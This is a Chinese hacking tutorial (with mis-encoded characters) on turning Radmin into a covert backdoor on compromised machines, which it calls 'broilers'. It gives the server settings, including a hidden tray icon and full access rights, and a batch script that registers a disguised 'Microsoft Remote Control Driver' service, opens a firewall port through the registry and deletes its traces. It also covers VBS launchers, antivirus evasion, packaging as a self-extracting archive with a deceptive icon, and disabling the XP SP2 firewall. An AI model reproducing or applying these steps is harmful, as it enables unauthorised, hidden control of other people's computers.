現(xiàn)在網(wǎng)上有很多關(guān)于Radmin的文章和教程,很多技術(shù)型站點都做了收費教程。下面我也來談?wù)劙?,替大家省錢了。Radmin是一款國外的遠程控制軟件,在國內(nèi)許多網(wǎng)站都可以下載到Radmin漢化版或者影子版,目前Radmin官方網(wǎng)站最新版是Radminv3.0(Beta2)版,此客戶端完全兼容以前的2.1或2.2版的服務(wù)器端。但某些功能需要3.0服務(wù)器端的支持,因此這些功能尚不可用。不過可以連接3.0影子版服務(wù)端,我試過了沒問題。它的連接方式是正向連接,我來介紹一下它的功能和用途:
1.傳輸速度和效率非常高,只要查找開放4899端口就是安裝Radmin服務(wù)端的機器了。
2.可以在win98和NT主機以應(yīng)用程序方式控制,也就是只要執(zhí)行服務(wù)端就行了。
3.在NT或win2000下可安裝成服務(wù),而且不需要IPC$管道。
4.自定服務(wù)端口可讓我們有很多選擇(不能劫持系統(tǒng)服務(wù)端口,如21、80等,)。
5.設(shè)置IP過濾可以增加你擁有肉雞的穩(wěn)定性。
6.不容易被殺毒軟件查殺(因為它屬于商業(yè)性質(zhì)的遠程控制軟件)。
7.可以不顯示系統(tǒng)托盤圖標。
8.完全免費的遠程控制軟件。
Radmin還有很多功能,但是重點就在于如何配置它的服務(wù)端。經(jīng)常使用遠程控制軟件的人都知道,控制端在自己機器上沒問題,服務(wù)端在遠程計算機上,如果配置有問題,被遠程管理員發(fā)現(xiàn),那么就功虧一簣了。所以配置服務(wù)端很重要,我們下載3.2影子免安裝版,把其中的以下3個文件留下(r_server.exe、raddrv.dll、AdmDll.dll)就行了。
接下來說一下Radmin的配置。在CMD下輸入:c:\R_server.exe /setup,彈出安裝設(shè)置窗,然后我們選擇設(shè)定密碼選項,彈出設(shè)置密碼對話框,這里設(shè)置的8位數(shù)密碼是在連接遠程機器的時候需要輸入的,一定要牢記。如果你想用NT服務(wù)器的賬號登陸,也可以在這里設(shè)置。這里可以設(shè)置肉雞的任何組的賬號,而且有全部的權(quán)限。這樣就跳過了NT的賬號檢查,如果這樣設(shè)置,那么還需要在Access rights里設(shè)置一下權(quán)限,一般我們選中All access(代表全部允許)就行了。控制大量肉雞的話不推薦選中NT賬號檢查。接下來我們打開選項設(shè)置參數(shù)。“IP過濾”可以設(shè)置允許連接的IP地址(當然是自己的IP地址),可以是單個IP地址,如10.10.10.10,網(wǎng)關(guān)設(shè)置成255.255.255.254就行了,當然也可以是C段IP地址,如10.10.10.0,網(wǎng)關(guān)設(shè)置成255.255.255.0就行了;“端口”默認是4899,你也可以設(shè)置為自己想要的端口,我設(shè)置的端口是1030?!叭蝿?wù)欄圖標”一定要設(shè)置成隱藏。下面的日志和連接確認不用選,點擊確定安裝即可。最后打開注冊表把HKEY_LOCAL_MACHINE\SYSTEM\RAdmin的注冊表文件導(dǎo)出,另存名為Emperor.reg。
接下來我們使用“超級捆綁”把這3個文件捆綁(r_server.exe、raddrv.dll、AdmDll.dll)。修改圖標為系統(tǒng)圖標,屬性修改選中“只讀”、“隱藏”和“系統(tǒng)”3項即可,然后還要更名為:svchosts.exe。最后還要做個免殺。然后再去下載兩款小工具,Killer(殺殺毒軟件防火墻的小工具)、SC(服務(wù)添加刪除更改工具),同樣給這兩個工具做免殺,以防萬一。免殺我們以后再說,不會的朋友去pediy下載加殼工具慢慢試吧。
再來制作一個Emperor.bat文件,內(nèi)容如下:
@echo off
@sc stop r_server
@sc stop radmm
@sc delete r_server
@sc delete radmm
@regedit /s Emperor.reg
@SC create Svchosts BinPath= "%systemroot%\system32\COM\Svchosts.exe /service" type= own type= interact start= auto DisplayName= "Microsoft Remote Control Driver"
@sc description Svchosts "Microsoft Remote Control Driver。"
@sc config wuauserv depend= Svchosts
@echo Windows Registry Editor Version 5.00 > %systemroot%\system32\COM\killFirewall.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List] >> %systemroot%\system32\COM\killFirewall.reg
@echo "1030:TCP"="1030:TCP:*:Enabled:Microsoft Remote Control Driver">> stemroot%\system32\COM\killFirewall.reg
@regedit /s %systemroot%\system32\COM\killFirewall.reg
@attrib +h +r %systemroot%\system32\COM\svchosts.exe
@sc start svchosts
@del /q /f /s %systemroot%\system32\COM\Emperor.reg
@del /q /f /s %systemroot%\system32\COM\Emperor.vbs
@del /q /f /s %systemroot%\system32\COM\Emperor.bat
@del /q /f /s %systemroot%\system32\COM\sc.exe
@del /q /f /s %systemroot%\system32\COM\killFirewall.reg
再來制作一個Emperor.vbs文件,內(nèi)容如下:
On Error Resume Next
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("Emperor.bat",0)
文件制作完成:svchosts.exe、Emperor.reg、Emperor.vbs、Emperor.bat、sc.exe、Killer.exe。將它們打包制成自解壓形式。勾選RAR里的“創(chuàng)建自解壓格式壓縮文件”,到高級里打開“自解壓選項”,“解壓路徑”為%systemroot%\system32\COM\,解壓后運行“Emperor.vbs”,解壓前運行“Killer.exe”,模式里選“全部隱藏”跟“跳過已經(jīng)存在文件”,文本和圖標選項里“從文件加載自解壓文件圖標”里選一個迷惑性的ico圖標做為自解壓最后生成的圖標。最后生成自解壓文件。搞定!
補充:再來看看另一種穿透Windows XP SP2防火墻的思路:我們先要把服務(wù)的類型改為禁用。運行輸入services.msc打開服務(wù)。找到Windows Firewall/Internet Connection Sharing (ICS)這個服務(wù),把類型設(shè)置為禁用:做到這一步后,我們打開控制面版-防火墻-例外-添加端口。因為我剛才設(shè)端口是1983,填入1983。然后我們要把Windows XP SP2防火墻服務(wù)的注冊表導(dǎo)出來。位置是在HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedAccess\ 導(dǎo)出命名為sharedaccess.reg,最后我們新建一個Emperor.vbs文件,輸入以下內(nèi)容:
set Emperor=wscript.createobject("wscript.shell")
Emperor.run "net stop sharedaccess",0
Emperor.run "regedit.exe /s shardaccess.reg",0
Emperor.run "regedit.exe /s radmin.reg",0
Emperor.run "r_server.exe /install /silence",0
Emperor.run "r_server.exe /start",0
把sharedaccess.reg和Emperor.vbs添加到配置好的Radmin的解壓縮包里就OK了。